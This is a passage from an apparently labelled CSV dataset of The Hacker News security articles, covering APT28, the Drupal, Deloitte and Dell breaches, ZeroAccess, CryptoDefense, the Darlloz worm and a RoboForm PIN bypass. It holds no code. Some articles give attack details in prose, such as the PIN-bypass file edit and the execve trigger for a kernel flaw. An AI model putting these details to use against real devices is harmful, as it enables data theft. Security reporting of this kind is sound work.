that Barracuda considered ""Password disclosure vulnerability"" out of scope vulnerability, IMHO I consider it a critical flaw. Ebrahim Hegazy has found and reported the vulnerability to Barracuda as a participant in the Barracuda bug bounty program. I consider Ebrahim Hegazy a very skilled professional that is doing an excellent job in security field, let's remind that in the last months he already discovered flaws in DropBox, Avira web site and Yahoo! ... What is the next? What will happen if these smart guys will start to sell the knowledge of vulnerabilities in the underground? ",Vulnerability APT28 — State Sponsored Russian Hacker Group,https://thehackernews.com/2014/10/APT28-Russian-hacker-cyber-espionage.html,"Nearly a decade-long cyber espionage group that targeted a variety of Eastern European governments and security-related organizations including the North Atlantic Treaty Organization (NATO) has been exposed by a security research firm. The US intelligence firm FireEye released its latest Advanced Persistent Threat (APT) report on Tuesday which said that the cyber attacks targeting various organisations would be of the interest to Russia, and ""may be"" sponsored by the Russian government. The Report entitled ""APT28: A Window Into Russia's Cyber Espionage Operations"" published by FireEye has ""evidence of long-standing, focused operations that indicate a government sponsor - specifically, a government based in Moscow."" ""Despite rumours of the Russian government's alleged involvement in high-profile government and military cyber attacks, there has been little hard evidence of any link to cyber espionage,"" Dan McWhorter, FireEye vice president of Threat Intelligence, wrote in a blog post discussing the report. ""FireEye's latest APT report sheds light on cyber espionage operations that we assess to be most likely to be sponsored by the Russian government, long believed to be a leader among major nations in performing sophisticated network attacks."" The cyber-espionage group believed to have been operating since at least 2007 in order to steal political and state secrets from businesses and foreign governments. The group launched a cyber attack on government in Georgia, Eastern Europe, as well as NATO and the Organisation for Security and Co-operation in Europe, according to the report. Whereas the Russian cyber criminal groups are known for conducting massive cyber campaigns aimed at stealing money and financial information, but APT28 focuses on ""privileged information related to governments, militaries and security organizations."" ""This group, unlike the China-based threat actors we track, does not appear to conduct widespread intellectual property theft for economic gain,"" FireEye stated in the report. ""Nor have we observed the group steal and profit from financial account information."" The security firm analyzed that the malware used by APT28 features a consistent use of the Russian language. Moreover, more than 96 percent of malware samples analyzed by the researchers were compiled between Monday and Friday, between 8AM and 6PM in the time zone paralleling working hours in Moscow and St. Petersburg. This regularity in the work suggests that the hackers were in Moscow, the report argues. The APT28 group has constantly updated their software and made the resulting binaries difficult to reverse engineer. It used a downloader tool that FireEye dubbed ""SOURFACE"", a backdoor labelled ""EVILTOSS"" that gives hackers remote access and a flexible modular implant called ""CHOPSTICK"" to enhance functionality of the espionage software. Infection is usually achieved via a spear phishing email with a relevant lure and the malware hidden in the attachment. The hacker group has also created a number of fake domains for UK-based defence events, including the Counter Terror Expo, as part of the operation to gather intelligence on attendees. Together with the help of above mentioned tools, the group gained access to the file system and registry; enumerate network resources; create processes; log keystrokes; access stored credentials; execute shellcode, and encrypt exfiltrated data uploaded with an RSA public key. ""The coding practices evident in the group's malware suggest both a high level of skill and an interest in complicating reverse engineering efforts,"" the report stated. In another report , a top White House official has confirmed that Russian hackers have hacked into the unclassified White House computer networks. ""we identified activity of concern on the unclassified Executive Office of the President network,"". Russia has been suspected of attacks on Ukraine too, including attempts to gain access to politicians' mobile phone communications. ",Malware Drupal resets 1 Million Passwords after Data Breach,https://thehackernews.com/2013/05/drupal-resets-1-million-passwords-after.html,"A Drupal data breach was announced by the official Drupal Association, that Passwords for almost one million accounts on the Drupal.org website are being reset after hackers gained unauthorized access to sensitive user data. The security of the open source content management system has been compromised via third-party software installed on the Drupal.org server infrastructure, and was not the result of a vulnerability within Drupal itself. As countermeasure it is resetting the passwords for nearly one million accounts in the wake of a data breach. Information exposed includes usernames, email addresses, and country information, as well as hashed passwords. The Drupal.org hasn't revealed the name of the third-party application exploited during the attack. Evidence of the Drupal data breach was found during a routine security audit: ""Upon discovering the files during a security audit, we shut down the association.drupal.org website to mitigate any possible ongoing security issues related to the files,"" ""The Drupal security team then began forensic evaluations and discovered that user account information had been accessed via this vulnerability."" ""The Drupal.org Security Team and Infrastructure Team have discovered unauthorized access to account information on Drupal.org and groups.drupal.org. This access was accomplished via third-party software installed on the Drupal.org server infrastructure, and was not the result of a vulnerability within Drupal itself. This notice applies specifically to user account data stored on Drupal.org and groups.drupal.org, and not to sites running Drupal generally."" The Drupal data breach is considerably really serious about user's security, an impressive amount of web sites is based on the popular content management. The thousands of websites that run on Drupal software estimated at 2 percent of all sites should not be affected by the data breach. The Drupal.org Security Team confirmed the ""unauthorized access"" to their system, highlighting that there's no evidence that any information was actually stolen. As a precautionary measure was requested all users to reset their passwords at their next login attempt. Holly Ross, Executive Director for Drupal Association confirmed that they are investigating on the incident that could have exposed also other info: ""We are still investigating the incident and may learn about other types of information compromised, in which case we will notify you accordingly"" The attacks to Open Source CMS solutions are not an isolated cases due their large diffusion, in the past Joomla and WordPress platforms were hit and used to spread malicious code, WordPress recently was hit by a massive ""brute-force"" attack by botnet composed by almost 100,000 bots. It's easy to predict that this kind of attacks is likely to increase for the large-diffusion of these platforms which makes them privileged targets. Drupal.org account holders will be required to change their password by entering their username or e-mail address, and following the link included in the e-mail message that follows. ",Vulnerability 2-Year-Old Linux Kernel Issue Resurfaces As High-Risk Flaw,https://thehackernews.com/2017/09/linux-kernel-hacking.html,"A bug in Linux kernel that was discovered two years ago, but was not considered a security threat at that time, has now been recognised as a potential local privilege escalation flaw. Identified as CVE-2017-1000253, the bug was initially discovered by Google researcher Michael Davidson in April 2015. Since it was not recognised as a serious bug at that time, the patch for this kernel flaw was not backported to long-term Linux distributions in kernel 3.10.77. However, researchers at Qualys Research Labs has now found that this vulnerability could be exploited to escalate privileges and it affects all major Linux distributions, including Red Hat, Debian, and CentOS. The vulnerability left ""all versions of CentOS 7 before 1708 (released on September 13, 2017), all versions of Red Hat Enterprise Linux 7 before 7.4 (released on August 1, 2017), and all versions of CentOS 6 and Red Hat Enterprise Linux 6 are exploitable,"" Qualys said in an advisory published yesterday. The vulnerability, which has been given a CVSS3 Base Score of 7.8 out of 10, resides in the way Linux kernel loads ELF executables, which potentially results in memory corruption. Researchers find that an unprivileged local user with access to SUID (or otherwise privileged) Position Independent Executable (PIE) binary could use this vulnerability to escalate their privileges on the affected system. In order to mitigate this issue, users can switch to the legacy mmap layout by setting vm.legacy_va_layout to 1, which will effectively disable the exploitation of this security flaw. Since the mmap allocations start much lower in the process address space and follow the bottom-up allocation model, ""the initial PIE executable mapping is far from the reserved stack area and cannot interfere with the stack."" Qualys says this flaw is not limited to the PIEs whose read-write segment is larger than 128MB, which is the minimum distance between the mmap_base and the highest address of the stack, not the lowest address of the stack. So, when passing 1.5GB of argument strings to execve(), any PIE can be mapped directly below the stack and trigger the vulnerability. Linux distributions, including Red Hat, Debian, and CentOS, have released security updates to address the vulnerability. The Qualys team has promised to publish a proof-of-concept soon exploit that works on CentOS-7 kernel versions ""3.10.0-514.21.2.el7.x86_64"" and ""3.10.0-514.26.1.el7.x86_64,"" once a maximum number of users have had time to patch their systems against the flaw. Stay Tuned! ",Vulnerability Oracle Database new zero day exploit put users at risk,https://thehackernews.com/2012/05/oracle-database-new-zero-day-exploit.html,"Oracle Database new zero day exploit put users at risk Oracle has recommended workarounds for a zero-day Oracle Database flaw that was not fixed in the company's April critical patch update. Oracle issued a security alert for Oracle TNS Poison, the vulnerability, disclosed by researcher Joxean Koret after he mistakenly thought it had been fixed by Oracle, allows an attacker to hijack the information exchanged between clients and databases. Koret originally reported the vulnerability to Oracle in 2008, four years ago! and said he was surprised to see it had been fixed in Oracle's most recent Critical Patch Update without any acknowledgment of his work. ""This vulnerability is remotely exploitable without authentication, and if successfully exploited, can result in a full compromise of the targeted Database,"" the company warned. ""This security alert addresses the security issue CVE-2012-1675, a vulnerability in the TNS listener which has been recently disclosed as 'TNS Listener Poison Attack' affecting the Oracle Database Server. This vulnerability may be remotely exploitable without authentication, i.e., it may be exploited over a network without the need for a username and password. A remote user can exploit this vulnerability to impact the confidentiality, integrity and availability of systems that do not have recommended solution applied"", Oracle wrote. A TNS Listener feature known as remote registration dates back to at least 1999 with version 8i of the Oracle Database. By sending a simple query to the service, an attacker can hijack connections legitimate users have already established with the database without the need of a password or other authentication. From then on, data traveling between legitimate users and the server pass through the connection set up by the attacker. Oracle released a critical update for versions 10g and 11g database products fixing this vulnerability. ",Vulnerability 9 million PCs infected with ZeroAccess botnet,https://thehackernews.com/2012/09/9-million-pcs-infected-with-zeroaccess.html,"In recent months, we've seen the rootkit family Win32/Sirefef and Win64/Sirefef (also known as ZeroAccess Botnet) update its command and control protocol and grow to infect more computers while connecting to over one million computers globally. Before, disclosed that it creates its own hidden partition on the hard drive and uses hidden alternative data streams to hide and thrive. Then ZeroAccess developer changed infection tactics and stopped using kernel-mode components in the latest version Security firms tracked the growth of x64 version infections. But Recently uncovered by SophosLabs that ZeroAccess botnet took a major shift in strategy and operating entirely in user-mode memory. There are two distinct ZeroAccess botnets, and each has a 32-bit version and a 64-bit version, numbering four botnets in total. Each botnet is self-contained because it communicates exclusively on a particular port number hard-coded into the bot executable. The botnets can be categorised based on their port numbers. Ports 16464 and 16465 are used by the 32-bit and 64-bit versions of one botnet; ports 16470 and 16471 are used by the 64-bit and 32-bit versions of the other botnet. They also disclose the ZeroAccess has been installed on computers over nine million times with the current number of active infected PCs numbering around one million. The current size of the botnet is somewhere in the region of 9 million machines spread throughout the world, but with the majority located in the U.S. Other than U.S other top infected countries are : Brazil Japan Romania Argentina Venezuela Chile The ZeroAccess botnet currently creates two primary revenue streams: click fraud and Bitcoin mining. Click fraud and Bitcoin mining can earn the botnet owners a potential $100,000 a day. ""The traffic generated by the ad-click fraud can burn through your bandwidth cap. We have been following a number of bots such as ZeroAccess whose primary function is ad-click fraud. These bots receive instructions from a controller directing them to click on ads on specific web sites. The web site owner gets paid by the advertiser on a per click basis usually through the intermediary of an ad network. The advertisers and ad network operator have a number of safeguards in place to protect against click fraud,"" the report said. The ZeroAccess botnet not only makes large amounts of money for its owners but it also causes significant damage and loss in a variety of ways to a variety of individuals and entities. Various aspects of ZeroAccess' operation consume considerable bandwidth. This is 1,227,300 bytes per hour, 29,455,200 per day and 895,929,000 bytes per month. 895 MB per month per bot means a botnet with 1 million nodes could be producing as much as 895,000,000 MB or 895 Terabytes of network traffic per month. And all of this occurs before any files are actually downloaded using the protocol. The peer-to-peer protocol used by the latest version of ZeroAccess contains only a few commands and is designed to spread files and IP addresses across the network quickly. It is encrypted to avoid easy detection and there are a number of measures taken to avoid the network being poisoned or taken over. This generally held at around 150,000 new installations per day, with a noticeable drop at the end of August. ",Malware Top 4 Data Breaches reported in last 24 Hours,https://thehackernews.com/2016/05/top-data-breach.html,"There is no doubt that data breaches are on the rise. Hardly a day goes without headlines about any significant data breach. According to the latest 'Cyber Security Breaches Survey 2016' report published by UK government, two-thirds of the biggest firm in the UK have experienced at least a cyber attacks or data breaches within the past 12 months. Here's today, I am writing about top 4 data breaches reported in last 24 hours, threatened your data privacy and online security. 1. Kiddicare Hacked! 794,000 Accounts Leaked Kiddicare has admitted that the company has suffered a data breach, which led to the theft of sensitive data belonging to 794,000 users, including phone numbers and residential addresses. Kiddicare, company that sells child toys and accessories across the United Kingdom, became aware of the data breach after its customers started receiving suspicious text messages – most likely part of a phishing campaign – that attempted to pilfer them to click on a link that takes them for an online survey. Although the company assured its customers that no banking or financial detail have been compromised in the breach, personal information belonging to nearly 794,000 customers, including their names, delivery addresses, email addresses and telephone numbers, have been exposed. 2. UserVoice Hacked! Users' Accounts Breached Today morning, I received an email from UserVoice, a web-based service that offers customer service and helpdesk tools, notifying that the company suffered a data breach and some user accounts were compromised, including their names, email addresses, and passwords. The company admitted that user passwords were protected with the SHA1 hashing algorithm, which is considered as a weak encryption. ""Despite the fact that the passwords were encrypted, it is very possible that an attacker can decrypt this information,"" the company notified. ""As a precautionary measure, we have reset all UserVoice passwords to prevent any chance of the attacker gaining further access to accounts."" Some famous companies are using customer service tools from UserVoice, including Twitch, Microsoft and more. 3. Google Suffers Insider Data Breach Google suffered a minor data breach after a vendor unintentionally leaked sensitive information about its undisclosed number of employees to the wrong email address — but luckily, the person who received it deleted the email straight away. According to report, the data breach happened after an employee at a third-party company that Google uses for its staff benefit management service mistakenly sent personal data to another company. Google is still investigating the insider data breach that leaked the personal details of Google employees apparently included Social Security Numbers (SSNs) and names, but no details on benefits or family members. 4. London Clinic fined £180,000 for Leaking HIV Patients Data The Information Commissioner's Office (ICO) has imposed a £180,000 (about $260,000) fine to a London-based HIV clinic run by Chelsea and Westminster Hospital National Health Service (NHS) Foundation Trust, for leaking data of 781 HIV patients The clinic mistakenly sent a newsletter email containing sensitive medical information relating to a total 781 HIV patients together rather than individually, using 'bcc' field in the email, leaking their names and email addresses to one another. ""People's use of a specialist service at a sexual health clinic is clearly sensitive personal data,"" Information Commissioner Christopher Graham said. ""The law demands this type of information is handled with particular care following clear rules, and put simply, this did not happen."" The Clinic's medical director said: ""We fully accept the ruling of the ICO for what was a serious breach, and we have worked to ensure that it can never happen again."" ",Data_Breaches New Apple vulnerability allows Malicious keylogger App to Record User Inputs,https://thehackernews.com/2014/02/new-apple-vulnerability-allows.html,"Yet another Apple vulnerability has been exposed by security researchers, that can be exploited to track your finger's every action on iOS Devices i.e. iPhone, iPad etc. The exploit reportedly targets a flaw in iOS multitasking capabilities to capture user inputs, according to Security researchers at FireEye. They found a way to bypass the Apple's app review process effectively and created a proof-of-concept Monitoring app for non-jailbroken iOS 7.0.x devices. The ""monitoring"" app, that runs in the background of the iPhone is a Keylogger Trojan which could allow hackers to monitor user's activities on the mobile device, including - touches on the screen, home button press, volume button press and TouchID press, and send all collected events to any remote server. According to researchers, their proof-of-concept app works on versions 7.0.4, 7.0.5, 7.0.6, and 6.1.x. ""Based on the findings, potential attackers can either use phishing to mislead the victim to install a malicious/vulnerable app or exploit another remote vulnerability of some app, and then conduct background monitoring."" FireEye researchers said. In iOS devices, the application running in the background keeps on refreshing itself; but the researchers also noted that disabling iOS 7's ""Background App Refresh"" setting would not restrict a malicious app from keylogging. ""For example, an app can play music in the background without turning on its ""background app refresh"" switch. Thus a malicious app can disguise itself as a music app to conduct background monitoring."" FireEye explained, So the only present solution to the problem is to manually remove apps from the task switcher. Earlier this week, Apple has issued an urgent update iOS 7.0.6 in response to a SSL vulnerability that might allow hackers to bypass SSL/TLS verifications on shared and public networks and steal users information from affected devices, including log-in usernames and passwords, as well as other sensitive information. The Security firm is actively working with Apple on the issue, but until the release of next iOS update, the only thing iOS users can do - Check and monitor the unnecessary applications running on the device via Task Manager and KILL THEM. Last month, Trustwave's Neal Hindocha also demonstrated that even Smartphone screen swipe gestures can be analyzed by hackers and as a proof-of-concept he developed a prototype 'Screenlogging' malware for the iOS and Android Smartphones that works the same as a keylogger software for desktop. ",Vulnerability "Adobe Releases Critical Security Updates for Flash Player, Acrobat and Adobe Reader",https://thehackernews.com/2014/08/adobe-security-update.html,"Adobe has released security updates to fix seven vulnerabilities in its Flash and Air platforms and one in its Reader and Acrobat which, according to the company, is being exploited by attackers in wild ""...in limited, isolated attacks targeting Adobe Reader users on Windows."" The vulnerabilities could allow an attacker to ""take control of affected systems"" marked critical by the company. A new, out-of-band patch addresses a zero-day vulnerability (CVE-2014-0546) in Adobe Reader and Acrobat that offers an attacker the possibility to bypass sandbox protection and has been leveraged in ""limited, isolated attacks"" against Windows users. ""These updates resolve a sandbox bypass vulnerability that could be exploited to run native code with escalated privileges on Windows,"" Adobe warned. The lone vulnerability in Adobe Acrobat and Reader was reported by Kaspersky Lab Global Research and Analysis Team director Costin Raiu and Vitaly Kamluk. However, details of the vulnerability were not disclosed, but Raiu said in a blog post that exploits have been observed in a rare number of targeted attacks, and that it's still important for everyone to patch as soon as possible. ""At the moment, we are not providing any details on these attacks as the investigation is still ongoing,"" Raiu said. ""Although these attacks are very rare, just to stay on the safe side we recommend everyone to get the update from the Adobe site as soon as possible."" The Apple OS X versions of Acrobat and Reader are not vulnerable. Only Reader and Acrobat versions 11.0.07 and earlier for Windows are affected, according to the company. The other security update patches seven vulnerabilities in Flash Player, most of which are rated critical by the company, but none of the Flash vulnerabilities are being exploited in the wild, Adobe said. Five of the updates resolved memory leakage vulnerabilities that can be used to bypass memory address randomization. Rest two patches address a security bypass vulnerability and a use-after-free flaw that could allow an attacker to remotely execute code on the affected system. The affected versions are as follow: Adobe Flash Player 14.0.0.145 and earlier versions for Windows and Macintosh Adobe Flash Player 11.2.202.394 and earlier versions for Linux Adobe AIR 14.0.0.110 and earlier versions for Windows and Macintosh Adobe AIR 14.0.0.137 SDK and earlier versions Adobe AIR 14.0.0.137 SDK & Compiler and earlier versions Adobe AIR 14.0.0.137 and earlier versions for Android The company urged its users to apply the updates within three days on Windows, Mac, and Linux platforms. Users may update Acrobat and Reader with the Help > Check for Updates menu option. Flash Player users may download the latest version from Adobe. Users of Internet Explorer and Google Chrome on Windows 8 and above will receive browser updates from those companies with fixed versions of their integrated Flash Player. Microsoft has also rolled out nine security updates to address at least 37 security holes in Windows and related software, including Internet Explorer, Windows Media Center, One Note, SQL Server, and SharePoint. The company has also made some important changes this month. Microsoft announced that it will soon begin blocking out-of-date ActiveX controls for Internet Explorer users, and will support only the latest versions of the .NET Framework and IE for each supported operating system. ",Vulnerability Dumb Ransomware Developer leaves Decryption Keys on Infected Computers,https://thehackernews.com/2014/04/dumb-ransomware-developer-leaves.html,"So, How do Hackers compromise a Website? Simply by exploiting the flaws in it, that means they took advantage of the error in the developers' code. Now, this time the hackers itself has left behind a crucial flaw in its malware code which can be exploited by us to help save our computer systems. Believe me, it's not an April Fools' joke! A malicious software program that holds the victims' computer files hostage by wrapping them with strong encryption until the victim pays a ransom fee to get them decrypted, has a critical flaw in its malware code itself that it leaves the decryption key on the victim's computer. The Anti-virus firm Symantec examined a sophisticated malware program dubbed as CryptoDefense (Trojan.Cryptodefense) ransomware, which appeared in the end of the last month. CryptoDefense is one of the complex malware programs that include a number of effective techniques, including Tor anonymity tool usage and Bitcoin digital currency to extort money from victims. CryptoDefense uses Microsoft's infrastructure and Windows API to generate the encryption and decryption keys, the antivirus firm wrote on its blog. CryptoDefense encrypts files using public-key cryptography, a strong RSA 2048 encryption in order to ensure files are held to ransom and transmits the private key in plain text back to the attacker's server, so that as soon as the ransom amount is paid by the victim, the attacker will release the private keys to decrypt the files. So, if once the files have been encrypted, without access to the private key, victims will not be able to decrypt the files. But here they stumbled, the CryptoDefense' developer failed to realize that the private key is also left concealed on the user's computer in a file folder with application data. ""Due to the attacker's poor implementation of the cryptographic functionality they have, quite literally, left their hostages a key to escape,"" Symantec wrote. Despite the dumb mistake of the malware developer, it is not sure that it will left the users untouched, because some technical skills is required to figure out the decryption keys. CryptoDefense is been sent out as spam emails, or masquerade itself as a PDF file and once installed in the system, it attempts to communicate with either of the four domains and uploads a profile of the infected machine, the firm wrote. The Cyber Criminals demand either $500 or €500 that has to be paid within four days and if victim doesn't pay the ransom in the given time frame, the ransom doubles itself. According to the firm, it is estimated that the cybercriminals received more than $34,000 worth of Bitcoin in just a month, which shows the effectiveness of their scam. Symantec said it has blocked 11,000 unique CryptoDefense ransomware infections in more than 100 countries, with the majority of the infection attempts are noticed in the U.S. followed by the U.K., Canada, Australia, Japan, India, Italy and the Netherlands. ",Malware Critical Vulnerability and Privacy LoopHole Found in RoboForm Password Manager,https://thehackernews.com/2014/07/critical-vulnerability-and-privacy.html,"Unless you are a human supercomputer, remembering password is not so easy, and that too if you have a different password for each site. But luckily to make the whole process very easy, there is a growing market out there for password managers and lockers with extra layers of security. But, if you are using the mobile version of most popular password manager from Password management company RoboForm to manage your passwords then you might be at a risk, claimed a UK based Security researcher. I am personally using RoboForm from last few months, which is a great password manager application developed by Siber Systems Inc. for various platforms that stores your sensitive data all in one place, protected at RoboForm account and encrypted by a secret master password. RoboForm user be able to then quickly access those passwords and notes anytime, anywhere. But a IT security consultant and tech enthusiast Paul Moore discovered one critical vulnerability in its app and one Privacy loophole in the RoboForm's service, that could allow attackers and prying eyes to get users' personal data, including stored login credentials of various websites and payment card details. Note: Yesterday we published this article with a conclusion that RoboForm is secure, but later after re-evaluating and discussing all factors, attack vectors with Moore, we found that RoboForm may leak your private data to attackers. 1) BYPASSING ROBOFORM DEVICE PIN PROTECTION The vulnerability disclosed by Paul Moore in the security of RoboForm affects its Android and iOS app users, which could allow anyone to bypass RoboForm's PIN Protection in order to access users' sensitive data. RoboForm mobile apps offer a PIN protection which only protects the app interface from unauthorized access, just like Android's popular 'AppLock' application. Moore claimed that simply by deleting a specific line (pref_pincode) in the RoboForm's preferences file placed in a folder on the device file system, It was possible for Moore to access confidential data and bypass authentication process on an Android device, even without the requirement of the Master Password, as shown in the Video demonstration uploaded by him. The important point to be noted here is that the RoboForm's app folder which Moore claims to access is actually placed in root directory of the device, which can't be accessed by the user or any 3rd party app on a non-rooted device. However, RoboForm team failed to reproduce the flaw and refused the bug report. ""We are not able to replicate it. As I mentioned in the write-up, it's done using an emulator, not a real device. While it's feasibly possible, it's very unlikely that the average person finding a phone with RoboForm installed could execute the precise steps needed to do what Mr. Moore is doing with the emulator."" RoboForm team said. Yesterday, when I also failed to reproduce it myself on my Android device, then Moore explained me that even after modification, the Roboform app loads the preference file from its cache. So either Roboform app or device requires to restart in order to bypass the PIN protection. Finally, I tried again. After restarting my Samsung Galaxy S4, I found that Roboform app opened without asking any PIN. Cool! Moore's vulnerability works. The vulnerability is serious, because the Roboform app stores all my passwords, secret notes and payment card details in it, and PIN bypass cloud allow anyone in 5 minutes with my phone to steal all my sensitive data. ""Additionally, our position is that if someone is able to root a phone, it's not just RoboForm that is vulnerable. Any other sensitive app would be vulnerable."" RoboForm team added. For successful exploitation, the targeted device should be rooted or jailbroken, but it can be easily done by attackers on the stolen devices. 2.) PRIVACY LOOPHOLE: MASTER PASSWORD SECRECY Moore believes that the company as a privacy loophole, allows them to store users' secret master password on their server at Siber Systems. But before proceeding to the details of this loophole, you should first learn - How Roboform works. After installing the Roboform app on Android or Windows system, it will ask you to either register or login with a RoboForm account. Once logged-in, you will get options to create or edit the payment card details, Notes and account passwords, etc. The Mobile app or desktop software will then prompt the user to set a ""Master Password"" in order to encrypt the data with a strong military grade encryption. Company claims that the Master Password works like a private crypto key, used to encrypts files locally on the device and then app upload them to their server in .RFN format. Moore claims that company stores the Master password, and asked on Twitter, ""How do you decrypt online before returning the data if you don't get the key?"", In Reply RoboForm said, ""Paul, we decrypt the data locally, not on the servers."" Once done, the master password will get stored only on the device to automate the future encryptions and decryptions for the users' convenience. ROBOFORM WEB APP CAN STORE YOUR MASTER PASSWORD Until here, Moore and me agree that the company is not capturing our private master password on the device apps or windows apps, but Roboform Everywhere also has online web app at https://online.roboform.com/login?lang=en location. Using this web app hosted on Siber System servers, users can login to their Roboform account and access the stored data from the web browser, as shown: But before accessing the encrypted data, users are required to enter their master password in order to decrypt it, that means users are sending their master keys to Siber System servers and company is decrypting the data on their servers. The above mechanism is completely opposite and conflicts with the company's policies, which claims that they do not store users' master key on their servers, instead they decrypt the data locally on the users' device. ""The Server has the necessary key required to decrypt the data. Breaking the key into segments does nothing to increase security. Ultimately, it doesn't change the fact that at some point, the private key is no longer private."" Moore justified his claim. At this moment neither I, nor Moore can proof that the company is saving your master key permanently after you once decrypt your data online via Roboform's web app, but in this age of mass surveillance, where every company is gathering our information and damaging our privacy, it is hardly to trust on any company, like - ""we get it, but we don't store it."" CONCLUSION PIN bypass vulnerability is working on all rooted and jailbroken devices, and it poses high risk where an app is developed with an aim to store your sensitive data securely with military grade encryption. We can't judge the intentions of the company, but the reported privacy loopholes could also allow government and law enforcement agencies to scrape our sensitive data by hook or crook. The company has promised to re-evaluate the way they store the Master Password on mobile devices and will enforce the user to enter their Master Password after a reboot, even if the user chooses the option to set the Master Password to 'Off'. ""This way, if a phone is lost and a third party tries to access RoboForm either by guessing the PIN or bypassing the PIN function, the third party would still be required to know the Master Password,"" said RoboForm. ",Vulnerability "Linux worm targeting Routers, Set-top boxes and Security Cameras with PHP-CGI Vulnerability",https://thehackernews.com/2013/11/Linux-ELF-malware-php-cgi-vulnerability.html,"A Symantec researcher has discovered a new Linux worm, targeting machine-to-machine devices, and exploits a PHP vulnerability (CVE-2012-1823) to propagate that has been patched as far back as May 2012. Linux worm, which has been dubbed Linux.Darlloz, poses a threat to devices such as home routers and set-top boxes, Security Cameras, and even industrial control systems. It is based on proof-of-concept code released in late October and it helps spread malware by exploiting a vulnerability in php-cgi. ""Upon execution, the worm generates IP addresses randomly, accesses a specific path on the machine with well-known ID and passwords, and sends HTTP POST requests, which exploit the vulnerability. If the target is unpatched, it downloads the worm from a malicious server and starts searching for its next target."" the Symantec researchers explained. The malware does not appear to perform any malicious activity other than silently spreading itself and wiping a load of system files. So far the malware variant targets x86 systems, because the malicious binary downloaded from the attacker's server is in ELF (Executable and Linkable Format) format for Intel architectures. However, the Symantec researchers claim the attacker also hosts variants of the worm for other architectures including ARM, PPC, MIPS and MIPSEL. No attacks have been reported in the wild, but warned that most users would not realize they were at risk as they would be unaware that their own devices ran on Linux. To protect their devices from the worm, users are advised to update their software to the latest version, make device passwords stronger and block incoming HTTP POST requests to the -/cgi-bin/php* paths. ",Vulnerability Deloitte Hacked — Cyber Attack Exposes Clients' Emails,https://thehackernews.com/2017/09/deloitte-hack.html,"Another day, another data breach. This time one of the world's ""big four"" accountancy firms has fallen victim to a sophisticated cyber attack. Global tax and auditing firm Deloitte has confirmed the company had suffered a cyber attack that resulted in the theft of confidential information, including the private emails and documents of some of its clients. Deloitte is one of the largest private accounting firms in the U.S. which offers tax, auditing, operations consulting, cybersecurity advisory, and merger and acquisition assistance services to large banks, government agencies and large Fortune 500 multinationals, among others. The global accountancy firm said Monday that its system had been accessed via an email platform from October last year through this past March and that ""very few"" of its clients had been affected, the Guardian reports. The firm discovered the cyber attack in March, but it believes the unknown attackers may have had access to its email system since October or November 2016. Hackers managed to gain access to the Deloitte's email server through an administrator account that wasn't secured using two-factor authentication (2FA), granting the attacker unrestricted access to Deloitte's Microsoft-hosted email mailboxes. Besides emails, hackers also may have had potential access to ""usernames, passwords, IP addresses, architectural diagrams for businesses and health information."" ""In response to a cyber incident, Deloitte implemented its comprehensive security protocol and began an intensive and thorough review including mobilising a team of cybersecurity and confidentiality experts inside and outside of Deloitte,"" a Deloitte spokesperson told the newspaper. ""As part of the review, Deloitte has been in contact with the very few clients impacted and notified governmental authorities and regulators."" Deloitte's internal investigation into the cyber incident is still ongoing, and the firm has reportedly informed only six of its clients that their information was ""impacted"" by the breach. Deloitte has become the latest of the victim of the high-profile cyber attack. Just last month, Equifax publicly disclosed a breach of its systems that exposed personal data of as many as 143 million US customers. Moreover, last week the U.S. Securities and Exchange Commission (SEC) also disclosed that hackers managed to hack its financial document filing system and illegally profited from the stolen information. ",Data_Breaches Dell Resets All Customers' Passwords After Potential Security Breach,https://thehackernews.com/2018/11/dell-data-breach-hacking.html,"Multinational computer technology company Dell disclosed Wednesday that its online electronics marketplace experienced a ""cybersecurity incident"" earlier this month when an unknown group of hackers infiltrated its internal network. On November 9, Dell detected and disrupted unauthorized activity on its network attempting to steal customer information, including their names, email addresses and hashed passwords. According to the company, the initial investigation found no conclusive evidence that the hackers succeeded to extract any information, but as a countermeasure Dell has reset passwords for all accounts on Dell.com website whether the data had been stolen or not. Dell did not share any information on how hackers managed to infiltrate its network at the first place or how many user accounts were affected, but the company did confirm that payment information and Social Security numbers were not targeted. ""Credit card and other sensitive customer information were not targeted. The incident did not impact any Dell products or services,"" Dell says. You are affected if you have ever created an account on the Dell website to purchase any of their products or to access the online support. ""Upon detection of the attempted extraction, Dell immediately implemented countermeasures and initiated an investigation. Dell also retained a digital forensics firm to conduct an independent investigation and has engaged law enforcement,"" the company said. We will update this story as more information becomes available. ",Cyber_Attack FBI cracks International Bot Network !,https://thehackernews.com/2011/04/fbi-cracks-international-bot-network.html,"FBI cracks International Bot Network ! The Department of Justice and FBI declared that it has cracked a network of hackers, who have infected almost 2 million computers with a harmful ""bot"" program, Coreflood that steals private and monetary data from computers. Identified as a ""bot"" network- as the malware can be managed distantly like a robot- it compromises machines with a software program called Coreflood, which downloads itself by finding out the vulnerability in systems, that are running Windows operating systems. The legal actions are the key components of the ""most complete and inclusive enforcement action ever taken by the U.S. authorities to put out of action an international botnet"", as per the statement from the Department of Justice, reports cnet News on April 13, 2011. As per a request from a temporary restraining order that was granted, it's the first time USA law enforcement has taken consent from a court for controlling a botnet. This malware (Coreflood) stores keystrokes and personal communications, making it enable to compromise login details, like passwords, and other personal and monetary data. Once a system is compromised with Coreflood, the malware contacts a command-and-control server, allowing it to distantly control the compromised machine. The government replaced the unauthentic command and control servers with substitute servers to prevent Coreflood from being used for any more harmful activity. U.S. Attorney David B. Fein for the District of Connecticut stated that the seizure of the Coreflood servers and Internet domain names can stop hackers from using Coreflood or systems infected by Coreflood for their evil purpose. He stated that he wished that his industry partners to work in cognition with the law enforcement in order to attain this great result, as per the news by CRN on April 13, 2011. But, it is impossible to know exactly the number of victims claimed by Coreflood, as machines are continuously being infected, disinfected and sometimes reinfected. While investigators estimated 413, 710 infected machines from March 2009 to January 2010, the total number of machines those were, or had been, part of Coreflood is more than 2.3 million, with almost 1.8 million seems to be located in the USA. ",Malware 191 Million US Voters' Personal Info Exposed by Misconfigured Database,https://thehackernews.com/2015/12/us-voter-database-hacked.html,"BREAKING: A misconfigured database has resulted in the exposure of around 191 Million voter records including voters' full names, their home addresses, unique voter IDs, date of births and phone numbers. The database was discovered on December 20th by Chris Vickery, a white hat hacker, who was able to access over 191 Million Americans' personal identifying information (PII) that are just sitting in the public to be found by anyone looking for it. Vickery is the same security researcher who uncovered personal details of 13 Million MacKeeper users two weeks ago, which included names, email addresses, usernames, password hashes, IP addresses, phone numbers, and system information. However, the recent discovery made him shocked when he saw his own information in the database, according to DataBreaches.net, whom the researcher contacted and provided all the details about his finding. 300GB Trove of Voters' 